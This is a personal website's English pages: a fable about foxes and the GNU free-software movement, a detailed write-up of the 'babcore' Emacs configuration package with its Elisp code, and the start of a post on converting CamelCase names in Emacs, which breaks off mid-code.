English

Here you can find my english pages. When there are enough of them, they might get the same or a similar structure as the german ones.

You can view these pages like a blog by checking the

 

< < new english posts (weblog) > >

 

- they also feature an RSS-Feed.

Also you can find some more of my english writings by looking at the blog-entries in LJ which I tagged english.

Best wishes,
Arne

A tale of foxes and freedom

Singing the songs of creation to shape a free world.

One day the silver kit asked the grey one:

“Who made the light, which brightens our singing place?”

The grey one looked at it lovingly and asked the kit to sit with him, for she would tell a story from the old days when the tribe was young.

“Once there was a time, when the world was light and happiness. During the day the sun shone on the savannah, and at night the moon cast the grass in a silver sheen.

It was during that time, when there were fewer animals in the wild, that the GNUs learned to work songs of creation, deep and vocal, and they taught us and everyone their new findings, and the life of our skulk was happiness and love.

But while the GNUs spread their songs and made new songs for every idea they could imagine, others invaded the plains, and they stole away the songs and only allowed singing them their way. And they drowned out the light, and with it went the happiness and love.

And when everyone shivered in cold and darkness, and stillness and despair were drawn over the land, the others created a false light which cast small enclosures into a pale flicker, into which they allowed only those animals who were willing to wear ropes on their throats and limbs, and many animals went to them to escape the darkness, while some fell deeper still and joined the others in enslaving their former friends.

Upon seeing this, the fiercest of the GNUs, the last one of the original herd, was filled with a terrible anger to see the songs of creation turned into a tool for slavery, and he made one special song which created a spark of true light in the darkness which could not be taken away, and which exposed the falsehood in the light of the others. And whenever he sang this song, those who were near him were touched by happiness.

But the others were many and the GNU was alone, and many animals succumbed to the ropes or the ropers and could move no more on their own.

To spread the song, the GNU now searched for other animals who would sing with it, and the song spread, and with it the freedom.

It was during these days, that the GNU met our founders, who lived in golden chains in a palace of glass.

In this palace they thought themselves lucky, and though the light of the palace grew ever paler and the chains grew heavier with every passing day, they didn't leave, because they feared the utter darkness out there.

When they then saw the GNU, they asked him: "Isn't your light weaker than this whole palace?" and the GNU answered: "Not if we sing it together", and they asked "But how will we eat in the darkness?" and the GNU answered "you'll eat in the light of your songs, and plants will grow wherever you sing", and they asked "But is it a song of foxes?" and the GNU said: "You can make it so", and he began to sing, and when our founders joined in, the light became shimmering silver like the moon they still remembered from the days and nights of light, and they rejoiced in its brightness.

And whenever this light touched the glass of the palace, the glass paled and showed its true being, and where the light touched the chains, they whithered and our founders went into the darkness with the newfound light of the moon as companion, and they thanked the GNU and promised to help it, whenever they were needed.

Then they set off to learn the many songs of the world and to spread the silver light of the moon wherever they came.

This is how our founders learned to sing the light, which brightens every one of our songs, and as our skulk grew bigger, the light grew stronger and it became a little moon, which will grow with each new kit, until its light will fill the whole world again one day.”

The grey one looked around where many kits had quietly found a place, and then she laughed softly, before she got up to fetch herself a meal for the night, and the kits began to speak all at once about her story. And they spoke until the silver kit raised its voice and sung the song of moonlight1, and they joined in and the song filled their hearts with joy and the air with light, and they knew that wherever they would travel, this skulk was where their hearts felt home.

PS: This story is far less loosely based on facts than it looks. There are songs of creation, namely computer programs, which once were free and which were truly taken away and used for casting others into darkness. And there was and still is the fierce GNU with his song of light and freedom, and he did spread it to make it into GNU/Linux and found the free software community we know today. If you want to know more about the story as it happened in our world, just read the less flowery story of Richard Stallman, free hackers and the creation of GNU or listen to the free song Infinite Hands.

PPS: I originally wrote this story for Phex, a free Gnutella based p2p filesharing program which also has an anonymous sibling (i2phex). It’s an even stronger fit for Firefox, though.

PPPS: License: This text is given into the public under the GNU FDL without invariant sections and other free licenses by Arne Babenhauserheide (who has the copyright on it).

P4S: Alternate link: http://www.draketo.de/english/tale-of-foxes-and-freedom


  1. To make it perfectly clear: This moonlight is definitely not the abhorrent and patent stricken silverlight port from the mono project. The foxes sing a song of freedom. They wouldn’t accept the shackles of Microsoft after having found their freedom. Sadly the PR departments of some groups try to take over analogies and strong names. Don’t be fooled by them. The moonlight in our songs is the light coming from the moon which resonates in the voices of the kits. And that light is free as in freedom, from copyright restrictions as well as from patent restrictions – though there certainly are people who would love to patent the light of the moon. Those are the ones we need to fight to defend our freedom. 

Emacs

Cross platform, Free Software, almost all features you can think of, graphical and in the shell: Learn once, use for everything.

» Get Emacs «

Emacs is a self-documenting, extensible editor, a development environment and a platform for lisp-programs - for example programs to make programming easier, but also for todo-lists on steroids, reading email, posting to identi.ca, and a host of other stuff (learn lisp).

It is one of the origins of GNU and free software (Emacs History).

In Markdown-mode it looks like this:

Emacs mit Markdown mode

More on emacs on my german Emacs page.

Babcore: Emacs Customizations everyone should have

Update (2017-05): babcore is at 0.2, but I cannot currently update the marmalade package.

1 Intro

PDF-version (for printing)

Package (to install)

orgmode-version (for editing)

repository (for forking)

project page (for fun ☺)

Emacs Lisp (to use)

I have been tweaking my emacs configuration for years, now, and I added quite some cruft. But while searching for the right way to work, I also found some gems which I direly miss in pristine emacs.

This file is about those gems.

Babcore is strongly related to Prelude. Actually it is just like prelude, but with the stuff I consider essential. And staying close to pristine Emacs, so you can still work at a coworkers desk.

But before we start, there is one crucial piece of advice which everyone who uses Emacs should know:

C-g: abort

Hold control and hit g.

That gets you out of almost any situation. If anything goes wrong, just hit C-g repeatedly till the problem is gone - or you cooled off far enough to realize that a no-op is the best way to react.

To repeat: If anything goes wrong, just hit C-g.

2 Package Header

As Emacs package, babcore needs a proper header.

;; Copyright (C) 2013 Arne Babenhauserheide

;; Author: Arne Babenhauserheide (and various others in Emacswiki and elsewhere).
;; Maintainer: Arne Babenhauserheide
;; Created 03 April 2013
;; Version: 0.1.0
;; Version Keywords: core configuration

;; This program is free software; you can redistribute it and/or
;; modify it under the terms of the GNU General Public License
;; as published by the Free Software Foundation; either version 3
;; of the License, or (at your option) any later version.

;; This program is distributed in the hope that it will be useful,
;; but WITHOUT ANY WARRANTY; without even the implied warranty of
;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
;; GNU General Public License for more details.

;; You should have received a copy of the GNU General Public License
;; along with this program. If not, see <http://www.gnu.org/licenses/>.

;;; Commentary:
;; Quick Start / installation:
;; 1. Download this file and put it next to other files Emacs includes
;; 2. Add this to you .emacs file and restart emacs:
;; 
;;      (require 'babcore)
;;
;; Alternatively install via package.el:
;;
;;      (require 'package)
;;      (add-to-list 'package-archives '("marmalade" . "http://marmalade-repo.org/packages/"))
;;      (package-refresh-contents)
;;      (package-install 'babcore)
;; 
;; Use Case: Use a common core configuration so you can avoid the
;;   tedious act of gathering all the basic stuff over the years and
;;   can instead concentrate on the really cool new stuff Emacs offers
;;   you.
;;

;;; Change Log:

;; 2016-06-05 - 0.1.0: replace desktop with better savehist config and
;;                     cleanup babcore. Replace flymake with flycheck.
;;                     Remove the eval-region key-chord. Simplify
;;                     x-urgent. Fix switching back from full-screen
;;                     mode. Remove babcore-shell-execute, since
;;                     async-shell-command (M-&) is a built-in which
;;                     does the job better. Add C-M-. as third alias
;;                     for goto-last-change. Add find-file-as-root and
;;                     a few fixes for encumbering behavior.
;; 2013-11-02 - Disable clipboard sync while exporting with org-mode
;;              org-export-dispatch
;; 2013-10-22 - More useful frame titles
;; 2013-04-03 - Minor adjustments
;; 2013-02-29 - Initial release

;;; Code:

Additionally it needs the proper last line. See finish up for details.

3 Feature Gems

3.1 package.el, full setup

The first thing you need in emacs 24. This gives you a convenient way to install just about anything, so you really should use it.

Also I hope that it will help consolidate the various emacs tips which float around into polished packages by virtue of giving people ways to actually get the package by name - and keep it updated almost automatically.

;; Convenient package handling in emacs

(require 'package)
;; use packages from marmalade
(add-to-list 'package-archives '("marmalade" . "http://marmalade-repo.org/packages/"))
;; and the old elpa repo
(add-to-list 'package-archives '("elpa-old" . "http://tromey.com/elpa/"))
;; and automatically parsed versiontracking repositories.
(add-to-list 'package-archives '("melpa" . "http://melpa.milkbox.net/packages/"))

;; Make sure a package is installed
(defun package-require (package)
  "Install a PACKAGE unless it is already installed 
or a feature with the same name is already active.

Usage: (package-require 'package)"
  ; try to activate the package with at least version 0.
  (package-activate package '(0))
  ; try to just require the package. Maybe the user has it in his local config

  (condition-case nil
      (require package)
    ; if we cannot require it, it does not exist, yet. So install it.
    (error (progn
             (package-install package)
             (require package)))))

;; Initialize installed packages
(package-initialize)  
;; package init not needed, since it is done anyway in emacs 24 after reading the init
;; but we have to load the list of available packages, if it is not available, yet.
(when (not package-archive-contents)
  (with-timeout (15 (message "updating package lists failed due to timeout"))
    (package-refresh-contents)))

3.2 Flycheck

Flycheck is an example of a quite complex feature which really everyone should have.

It can check any kind of code, and actually anything which can be verified with a program which gives line numbers.

This is a drop-in replacement for the older flymake. See Spotlight: Flycheck, a Flymake replacement for reasons to switch to flycheck.

;; Flycheck: On the fly syntax checking
(package-require 'flycheck)
(add-hook 'after-init-hook #'global-flycheck-mode)
; stronger error display
(defface flycheck-error
  '((t (:foreground "red" :underline (:color "Red1" :style wave) :weight bold)))
  "Flycheck face for errors"
  :group "flycheck")

3.3 auto-complete

This gives you inline auto-completion preview with an overlay window - even in the text-console. Partially this goes as far as API-hints (for example for elisp code). Absolutely essential.

;; Inline auto completion and suggestions
(package-require 'auto-complete)
;; avoid competing with org-mode templates.
(add-hook 'org-mode-hook
          (lambda ()
            (make-local-variable 'ac-stop-words)
            (loop for template in org-structure-template-alist do
                  (add-to-list 'ac-stop-words 
                               (concat "<" (car template))))))

3.4 ido

To select a file in a huge directory, just type a few letters from that file in the correct order, leaving out the non-identifying ones. Darn cool!

; use ido mode for file and buffer Completion when switching buffers
(require 'ido)
(ido-mode t)

3.5 printing

Printing in pristine emacs is woefully inadequate, even though it is a standard function in almost all other current programs.

It can be easy, though:

;; Convenient printing
(require 'printing)
(pr-update-menus t)
; make sure we use localhost as cups server
(setenv "CUPS_SERVER" "localhost")
(package-require 'cups)

3.6 outlining everywhere

Code folding is pretty cool to get an overview of a complex structure. So why shouldn’t you be able to do that with any kind of structured data?

; use allout minor mode to have outlining everywhere.
(allout-mode)

3.7 Syntax highlighting

Font-lock is the emacs name for syntax highlighting - in just about anything.

; syntax highlighting everywhere
(global-font-lock-mode 1)

3.8 org and babel

Org-mode is that kind of simple thing which evolves to a way of life when you realize that most of your needs actually are simple - and that the complex things can be done in simple ways, too.

It provides simple todo-lists, inline-code evaluation (as in this file) and a full-blown literate programming, reproducible research publishing platform. All from the same simple basic structure.

It might change your life… and it is the only planning solution which ever prevailed against my way of life and organization.

; Activate org-mode
(require 'org)
; and some more org stuff

; http://orgmode.org/guide/Activation.html#Activation

; The following lines are always needed.  Choose your own keys.
(add-to-list 'auto-mode-alist '("\\.org\\'" . org-mode))
; And add babel inline code execution
; babel, for executing code in org-mode.
(org-babel-do-load-languages
 'org-babel-load-languages
 ; load all language marked with (lang . t).
 '((C . t)
   (R . t)
   (asymptote)
   (awk)
   (calc)
   (clojure)
   (comint)
   (css)
   (ditaa . t)
   (dot . t)
   (emacs-lisp . t)
   (fortran)
   (gnuplot . t)
   (haskell)
   (io)
   (java)
   (js)
   (latex)
   (ledger)
   (lilypond)
   (lisp)
   (matlab)
   (maxima)
   (mscgen)
   (ocaml)
   (octave)
   (org . t)
   (perl)
   (picolisp)
   (plantuml)
   (python . t)
   (ref)
   (ruby)
   (sass)
   (scala)
   (scheme)
   (screen)
   (sh . t)
   (shen)
   (sql)
   (sqlite)))

3.9 Nice line wrapping

If you’re used to other editors, you’ll want to see lines wrapped nicely at the word-border instead of lines which either get cut at the end or in the middle of a word.

global-visual-line-mode gives you that.

; Add proper word wrapping
(global-visual-line-mode t)

3.10 goto-chg

This is the kind of feature which looks tiny: Go to the place where you last changed something.

And then you get used to it and it becomes absolutely indispensable.

; go to the last change
(package-require 'goto-chg)
(global-set-key [(control .)] 'goto-last-change)
; M-. can conflict with etags tag search. But C-. can get overwritten
; by flyspell-auto-correct-word. And goto-last-change needs a really
; fast key.
(global-set-key [(meta .)] 'goto-last-change)
; ensure that even in worst case some goto-last-change is available
(global-set-key [(control meta .)] 'goto-last-change)

3.11 flyspell

Whenever you write prosa, a spellchecker is worth a lot, but it should not unnerve you.

Install aspell, then activate flyspell-mode whenever you need it.

It needs some dabbling, though, to make it work nicely with non-english text.

(require 'flyspell)
; Make german umlauts work.
(setq locale-coding-system 'utf-8)
(set-terminal-coding-system 'utf-8)
(set-keyboard-coding-system 'utf-8)
(set-selection-coding-system 'utf-8)
(prefer-coding-system 'utf-8)

;aspell und flyspell
(setq-default ispell-program-name "aspell")

;make aspell faster but less correctly
(setq ispell-extra-args '("--sug-mode=ultra" "-w" "äöüÄÖÜßñ"))
(setq ispell-list-command "list")

3.12 control-lock

If you have to do the same action repeatedly, for example with flyspell hitting next-error and next-correction hundreds of times, the need to press control can really be a strain for your fingers.

Sure, you can use viper-mode and retrain your hands for the completely alien command set of vim.

A simpler solution is adding a sticky control key - and that’s what control-lock does: You get modal editing with your standard emacs commands.

Since I am a german, I simply use the german umlauts to toggle the control-lock. You will likely want to choose your own commands here.

; control-lock-mode, so we can enter a vi style command-mode with standard emacs keys.
(package-require 'control-lock)
; also bind M-ü and M-ä to toggling control lock.
(global-set-key (kbd "M-ü") 'control-lock-toggle)
(global-set-key (kbd "C-ü") 'control-lock-toggle)
(global-set-key (kbd "M-ä") 'control-lock-toggle)
(global-set-key (kbd "C-ä") 'control-lock-toggle)
(global-set-key (kbd "C-z") 'control-lock-toggle)

3.13 Basic key chords

This is the second strike for saving your pinky. Yes, Emacs is hard on the pinky. Even if it were completely designed to avoid strain on the pinky, it would still be hard, because any system in which you do not have to reach for the mouse is hard on the pinky.

But it also provides some of the neatest tricks to reduce that strain, so you can make Emacs your pinky saviour.

The key chord mode allows you to hit any two keys at (almost) the same time to invoke commands. Since this can interfere with normal typing, I would only use it for letters which are rarely typed after each other.

These default chords have proven themselves to be useful in years of working with Emacs.

; use key chords invoke commands
(package-require 'key-chord)
(key-chord-mode 1)
; buffer actions
(key-chord-define-global "vb"     'eval-buffer)
(key-chord-define-global "cy"     'yank-pop)
(key-chord-define-global "cg"     "\C-c\C-c")
; frame actions
(key-chord-define-global "xo"     'other-window);
(key-chord-define-global "x1"     'delete-other-windows)
(key-chord-define-global "x0"     'delete-window)
(defun kill-this-buffer-if-not-modified ()
  (interactive)
  ; taken from menu-bar.el
  (if (menu-bar-non-minibuffer-window-p)
      (kill-buffer-if-not-modified (current-buffer))
    (abort-recursive-edit)))
(key-chord-define-global "xk"     'kill-this-buffer-if-not-modified)
; file actions
(key-chord-define-global "bf"     'ido-switch-buffer)
(key-chord-define-global "cf"     'ido-find-file)
(key-chord-define-global "vc"     'vc-next-action)

To complement these tricks, you should also install and use workrave or at least type-break-mode.

3.14 X11 tricks

These are ways to improve the integration of Emacs in a graphical environment.

We have this cool editor. But it is from the 90s, and some of the more modern concepts of graphical programs have not yet been integrated into its core. Maybe because everyone just adds them to the custom setup :)

On the other hand, Emacs always provided split windows and many of the “new” window handling functions in dwm and similar - along with a level of integration with which normal graphical desktops still have to catch up. Open a file, edit it as text, quickly switch to org-mode to be able to edit an ascii table more efficiently, then switch to html mode to add some custom structure - and all that with a consistent set of key bindings.

But enough with the glorification, let’s get to the integration of stuff where Emacs arguably still has weaknesses.

3.14.1 frame-to-front

Get the current Emacs frame to the front. You can for example call this via emacsclient and set it as a keyboard shortcut in your desktop (for me it is F12):

emacsclient -e "(show-frame)"

This sounds much easier than it proves to be in the end… but luckily you only have to solve it once, then you can google it anywhere…

(defun show-frame (&optional frame)
  "Show the current Emacs frame or the FRAME given as argument.

And make sure that it really shows up!"
  (raise-frame)
  ; yes, you have to call this twice. Don’t ask me why…
  ; select-frame-set-input-focus calls x-focus-frame and does a bit of
  ; additional magic.
  (select-frame-set-input-focus (selected-frame))
  (select-frame-set-input-focus (selected-frame)))

3.14.2 urgency hint

Make Emacs announce itself in the tray.

;; let emacs blink when something interesting happens.
;; in KDE this marks the active Emacs icon in the tray.
(defun x-urgency-hint (frame arg &optional source)
  "Set the x-urgency hint for the frame to arg: 

- If arg is nil, unset the urgency.
- If arg is any other value, set the urgency.

If you unset the urgency, you still have to visit the frame to make the urgency setting disappear (at least in KDE)."
    (let* ((wm-hints (append (x-window-property 
                "WM_HINTS" frame "WM_HINTS" source nil t) nil))
     (flags (car wm-hints)))
    (setcar wm-hints
        (if arg
        (logior flags #x100)
          (logand flags (lognot #x100))))
    (x-change-window-property "WM_HINTS" wm-hints frame "WM_HINTS" 32 t)))

(defun x-urgent (&optional arg)
  "Mark the current emacs frame as requiring urgent attention. 

With a prefix argument which does not equal a boolean value of nil, remove the urgency flag (which might or might not change display, depending on the window manager)."
  (interactive "P")
  (let (frame (selected-frame))
  (x-urgency-hint frame (not arg))))

3.14.3 fullscreen mode

Hit F11 to enter fullscreen mode. Any self-respecting program should have that… and now Emacs does, too.

; fullscreen, taken from http://www.emacswiki.org/emacs/FullScreen#toc26
; should work for X und OSX with emacs 23.x (TODO find minimum version).
; for windows it uses (w32-send-sys-command #xf030) (#xf030 == 61488)
(defvar babcore-fullscreen-p nil
  "Check if fullscreen is on or off")
(defvar babcore-stored-frame-width nil 
  "width of the frame before going fullscreen")
(defvar babcore-stored-frame-height nil
  "width of the frame before going fullscreen")

(defun babcore-non-fullscreen ()
  (interactive)
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND restore #xf120
      (w32-send-sys-command 61728)
    (progn (set-frame-parameter nil 'fullscreen nil)
           (set-frame-parameter nil 'width 
                                (if babcore-stored-frame-width
                                    babcore-stored-frame-width 82))
           (sleep-for 0 1) ; 1ms sleep: workaround to avoid unsetting the width in the next command
           (set-frame-parameter nil 'height
                                (if babcore-stored-frame-height 
                                    babcore-stored-frame-height 42)))))

(defun babcore-fullscreen ()
  (interactive)
  (setq babcore-stored-frame-width (frame-width))
  (setq babcore-stored-frame-height (frame-height))
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND maximaze #xf030
      (w32-send-sys-command 61488)
    (set-frame-parameter nil 'fullscreen 'fullboth)))

(defun toggle-fullscreen ()
  (interactive)
  (setq babcore-fullscreen-p (not babcore-fullscreen-p))
  (if babcore-fullscreen-p
      (babcore-non-fullscreen)
    (babcore-fullscreen)))

(global-set-key [f11] 'toggle-fullscreen)

3.14.4 default key bindings

I always hate it when some usage pattern which is consistent almost everywhere fails with some program. Especially if that is easily avoidable.

This code fixes that for Emacs in KDE.

; Default KDE keybindings to make emacs nicer integrated into KDE. 

; can treat C-m as its own mapping.
; (define-key input-decode-map "\C-m" [?\C-1])

(defun revert-buffer-preserve-modes ()
  (interactive)
  (revert-buffer t nil t))

; C-m shows/hides the menu bar - thanks to http://stackoverflow.com/questions/2298811/how-to-turn-off-alternative-enter-with-ctrlm-in-linux
; f5 reloads
(defconst kde-default-keys-minor-mode-map
  (let ((map (make-sparse-keymap)))
    (set-keymap-parent map text-mode-map)
    (define-key map [f5] 'revert-buffer-preserve-modes)
    (define-key map [?\C-1] 'menu-bar-mode)
    (define-key map [?\C-+] 'text-scale-increase)
    (define-key map [?\C--] 'text-scale-decrease) ; shadows 'negative-argument which is also available via M-- and C-M--, though.
    (define-key map [C-kp-add] 'text-scale-increase)
    (define-key map [C-kp-subtract] 'text-scale-decrease)
    map)
  "Keymap for `kde-default-keys-minor-mode'.")

;; Minor mode for keypad control
(define-minor-mode kde-default-keys-minor-mode
  "Adds some default KDE keybindings"
  :global t
  :init-value t
  :lighter ""
  :keymap 'kde-default-keys-minor-mode-map
  )

3.14.5 Useful Window/frame titles

The titles of windows of GNU Emacs normally look pretty useless (just stating emacs@host), but it’s easy to make them display useful information:

;; Set the frame title as by http://www.emacswiki.org/emacs/FrameTitle
(setq frame-title-format (list "%b ☺ " (user-login-name) "@" (system-name) "%[ - GNU %F " emacs-version)
      icon-title-format (list "%b ☻ " (user-login-name) "@" (system-name) " - GNU %F " emacs-version))

Now we can always see the name of the open buffer in the frame. No more searching for the right emacs window to switch to in the window list.

3.15 Insert unicode characters

Actually you do not need any configuration here. Just use

M-x ucs-insert

To insert any unicode character. If you want to see them while selecting, have a look at xub-mode from Ergo Emacs.

3.16 Highlight TODO and FIXME in comments

This is a default feature in most IDEs. Since Emacs allows you to build your own IDE, it does not offer it by default… but it should, since that does not disturb anything. So we add it.

fic-ext-mode highlight TODO and FIXME in comments for common programming languages.

;; Highlight TODO and FIXME in comments 
(package-require 'fic-ext-mode)
(defun add-something-to-mode-hooks (mode-list something)
  "helper function to add a callback to multiple hooks"
  (dolist (mode mode-list)
    (add-hook (intern (concat (symbol-name mode) "-mode-hook")) something)))

(add-something-to-mode-hooks '(c++ tcl emacs-lisp python text markdown latex) 'fic-ext-mode)

3.17 Save macros as functions

Now for something which should really be provided by default: You just wrote a cool emacs macro, and you are sure that you will need that again a few times.

Well, then save it!

In standard emacs that needs multiple steps. And I hate that. Something as basic as saving a macro should only need one single step. It does now (and Emacs is great, because it allows me to do this!).

This bridges the gap between function definitions and keyboard macros, making keyboard macros something like first class citizens in your Emacs.

; save the current macro as reusable function.
(defun save-current-kbd-macro-to-dot-emacs (name)
  "Save the current macro as named function definition inside
your initialization file so you can reuse it anytime in the
future."
  (interactive "SSave Macro as: ")
  (name-last-kbd-macro name)
  (save-excursion 
    (find-file-literally user-init-file)
    (goto-char (point-max))
    (insert "\n\n;; Saved macro\n")
    (insert-kbd-macro name)
    (insert "\n")))

3.18 Transparent GnuPG encryption

If you have a diary or similar, you should really use this. It only takes a few lines of code, but these few lines are the difference between encryption for those who know they need it and encryption for everyone.

; Activate transparent GnuPG encryption.
(require 'epa-file)
(epa-file-enable)

3.19 Colored shell commands

A shell without colors is really hard to read. Use M-& to run your shell-commands asynchronously and in shell-mode (via async-shell-command).

3.20 Save backups in ~/.local/share/emacs-saves

This is just an aestetic value: Use the directories from the freedesktop specification for save files.

Thanks to the folks at CERN for this.

(setq backup-by-copying t      ; don't clobber symlinks
      backup-directory-alist
      '(("." . "~/.local/share/emacs-saves"))    ; don't litter my fs tree
      delete-old-versions t
      kept-new-versions 6
      kept-old-versions 2
      version-control t)       ; use versioned backups

3.21 Basic persistency

If I restart the computer I want my editor to make it easy for me to continue where I left off.

It’s bad enough that most likely my brain buffers were emptied. At least my editor should remember how to go on.

3.21.1 saveplace

If I reopen a file, I want to start at the line at which I was when I closed it.

; save the place in files
(require 'saveplace)
(setq-default save-place t)

3.21.2 savehist

And I want to be able to call my recent commands in the minibuffer. I normally don’t type the full command name anyway, but rather C-r followed by a small part of the command. Losing that on restart really hurts, so I want to avoid that loss.

; save minibuffer history
(require 'savehist)
;; increase the default history cutoff
(setq history-length 500)
(savehist-mode t)
(setq savehist-additional-variables
      '(regexp-search-ring
        register-alist))

If this does not suffice for you, have a look at desktop, the chainsaw of Emacs persistency.

3.22 use the system clipboard

Finally one more minor adaption: Treat the clipboard gracefully. This is a tightrope stunt and getting it wrong can feel awkward.

This is the only setting for which I’m not sure that I got it right, but it’s what I use…

(setq x-select-enable-clipboard t)

But do not synchronize anything to the clipboard or primary selection (mouse-selection) while compiling an org-mode file. When I have it enabled, compiling an org-mode file to PDF locks KDE - I think it does so by filling up the clipboard. So the system clipboard is disabled, now, and I use the mouse-selection to transfer text from emacs to other parts.

; When I have x-select-enable-clipboard enabled, compiling an org-mode file to PDF locks
; KDE - I think it does so by filling up the clipboard.
(defadvice org-export-dispatch-no-clipboard-advice (around org-export-dispatch)
  "Do not clobber the system-clipboard while compiling an org-mode file with `org-export`."
  (let ((select-active-regions nil)
        (x-select-enable-clipboard nil)
        (x-select-enable-primary nil)
        (interprogram-cut-function nil)
        (interprogram-paste-function nil))
    ad-do-it))
(ad-activate 'org-export-dispatch-no-clipboard-advice t)

3.23 Add license headers automatically

In case you mostly write free software, you might be as weary of hunting for the license header and copy pasting it into new files as I am. Free licenses, and especially copyleft licenses, are one of the core safeguards of free culture, because they give free software developers an edge over proprietarizing folks. But they are a pain to add to every file…

Well: No more. We now have legalese mode to take care of the inconvenient legal details for us, so we can focus on the code we write. Just call M-x legalese to add a GPL header, or C-u M-x legalese to choose another license.

(package-require 'legalese)

3.24 Find file as root

When I needed to open a file as root to do a quick edit, I used to dump into a shell and run sudo nano FILE, just because that was faster. Since I started using find-current-as-root, I no longer do that: Opening the file as root is now convenient enough in Emacs to no longer tempt me to drop to the shell.

;;; Open files as root - quickly
(defcustom find-file-root-prefix "/sudo:root@localhost:"
"Tramp root prefix to use.")

(defun find-file-as-root ()
  "Like `ido-find-file, but automatically edit the file with
root-privileges (using tramp/sudo), if the file is not writable by
user."
  (interactive)
  (let ((file (ido-read-file-name "Edit as root: ")))
    (unless (file-writable-p file)
      (setq file (concat find-file-root-prefix file)))
    (find-file file)))
;; or some other keybinding...
;; (global-set-key (kbd "C-x F") 'djcb-find-file-as-root)

(defun find-current-as-root ()
  "Reopen current file as root"
  (interactive)
  (set-visited-file-name (concat find-file-root-prefix (buffer-file-name)))
  (setq buffer-read-only nil))

3.25 Fixes

This stuff should become obsolete, but at the moment it is still needed to improve the Emacs Experience.

;;;;;;;;;;;;;
;;; Fixes ;;;
;;;;;;;;;;;;;

3.25.1 Comint: recognize password in all languages

;; Make comint recognize passwords in virtually all languages.
(defcustom comint-password-prompt-regexp
  (concat
   "\\(^ *\\|"
   (regexp-opt
    '("Enter" "enter" "Enter same" "enter same" "Enter the" "enter the"
      "Old" "old" "New" "new" "'s" "login"
      "Kerberos" "CVS" "UNIX" " SMB" "LDAP" "[sudo]" "Repeat" "Bad") t)
   " +\\)"
   (regexp-opt
    '("Adgangskode" "adgangskode" "Contrasenya" "contrasenya" "Contraseña" "contraseña" "Geslo" "geslo" "Hasło" "hasło" "Heslo" "heslo" "Iphasiwedi" "iphasiwedi" "Jelszó" "jelszó" "Lozinka" "lozinka" "Lösenord" "lösenord" "Mot de passe " "Mot de Passe " "mot de Passe " "mot de passe " "Mật khẩu " "mật khẩu" "Parola" "parola" "Pasahitza" "pasahitza" "Pass phrase" "pass Phrase" "pass phrase" "Passord" "passord" "Passphrase" "passphrase" "Password" "password" "Passwort" "passwort" "Pasvorto" "pasvorto" "Response" "response" "Salasana" "salasana" "Senha" "senha" "Wachtwoord" "wachtwoord" "slaptažodis" "slaptažodis" "Лозинка" "лозинка" "Пароль" "пароль" "ססמה" "كلمة السر" "गुप्तशब्द" "शब्दकूट" "গুপ্তশব্দ" "পাসওয়ার্ড" "ਪਾਸਵਰਡ" "પાસવર્ડ" "ପ୍ରବେଶ ସଙ୍କେତ" "கடவுச்சொல்" "సంకేతపదము" "ಗುಪ್ತಪದ" "അടയാളവാക്ക്" "රහස්පදය" "ពាក្យសម្ងាត់ ៖ " "パスワード" "密码" "密碼" "암호"))
   "\\(?:\\(?:, try\\)? *again\\| (empty for no passphrase)\\| (again)\\)?\
\\(?: for [^:]+\\)?:\\s *\\'")
  "Regexp matching prompts for passwords in the inferior process.
This is used by `comint-watch-for-password-prompt'."
  :version "24.3"
  :type 'regexp
  :group 'comint)

3.25.2 Autoconf-mode builtins

;; Mark all AC_* and AS_* functions as builtin.
(add-hook 'autoconf-mode-hook 
          (lambda () 
            (add-to-list 'autoconf-font-lock-keywords '("\\(\\(AC\\|AS\\|AM\\)_.+?\\)\\((\\|\n\\)" (1 font-lock-builtin-face)))))

3.25.3 Do not beep on alt-gr/M4

; tell emacs to ignore alt-gr clicks needed for M4 in the Neo Layout.
(define-key special-event-map (kbd "<key-17>") 'ignore)
(define-key special-event-map (kbd "<M-key-17>") 'ignore)

3.25.4 yank-pop should just yank on first invocation

When you run yank-pop after a yank, it replaces the yanked text. When you did not do a yank before, it errors out.

This change makes yank-pop yank instead so you can simply hit C-y repeatedly to first yank and then cycle through the yank history.

; yank-pop should yank if the last command was no yank.
(defun yank-pop (&optional arg)
  "Replace just-yanked stretch of killed text with a different stretch.
At such a time, the region contains a stretch of reinserted
previously-killed text.  `yank-pop' deletes that text and inserts in its
place a different stretch of killed text.

With no argument, the previous kill is inserted.
With argument N, insert the Nth previous kill.
If N is negative, this is a more recent kill.

The sequence of kills wraps around, so that after the oldest one
comes the newest one.

When this command inserts killed text into the buffer, it honors
`yank-excluded-properties' and `yank-handler' as described in the
doc string for `insert-for-yank-1', which see."
  (interactive "*p")
  (if (not (eq last-command 'yank))
      (yank)
    (setq this-command 'yank)
    (unless arg (setq arg 1))
    (let ((inhibit-read-only t)
          (before (< (point) (mark t))))
      (if before
          (funcall (or yank-undo-function 'delete-region) (point) (mark t))
        (funcall (or yank-undo-function 'delete-region) (mark t) (point)))
      (setq yank-undo-function nil)
      (set-marker (mark-marker) (point) (current-buffer))
      (insert-for-yank (current-kill arg))
      ;; Set the window start back where it was in the yank command,
      ;; if possible.
      (set-window-start (selected-window) yank-window-start t)
      (if before
          ;; This is like exchange-point-and-mark, but doesn't activate the mark.
          ;; It is cleaner to avoid activation, even though the command
          ;; loop would deactivate the mark because we inserted text.
          (goto-char (prog1 (mark t)
                       (set-marker (mark-marker) (point) (current-buffer))))))
    nil))

3.25.5 Blink instead of beeping

(setq visible-bell t)

3.25.6 vc-state is slow

TODO: Adjust vc-find-file-hook to call the vcs tool asynchronously.

3.26 finish up

Make it possible to just (require 'babcore) and add the proper package footer.

(provide 'babcore)
;;; babcore.el ends here

4 Summary

With the babcore you have a core setup which exposes some of the essential features of Emacs and adds basic integration with the system which is missing in pristine Emacs.

Now go and see the M-x package-list-packages to see where you can still go - or just use Emacs and add what you need along the way. The package list is your friend, as is Emacswiki.

Happy Hacking!

Note: As almost everything on this page, this text and code is available under the GPLv3 or later.

Conveniently convert CamelCase to words_with_underscores using a small emacs hack

I currently cope with refactoring in an upstream project to which I maintain some changes which upstream does not merge. One nasty part is that the project converted from CamelCase for function names to words_with_underscores. And that created lots of merge errors.

Today I finally decided to speed up my work.

The first thing I needed was a function to convert a string in CamelCase to words_with_underscores. Since I’m lazy, I used google, and that turned up the CamelCase page of Emacswiki - and with it the following string functions:

(defun split-name (s)
  (split-string
   (let ((case-fold-search nil))
     (downcase
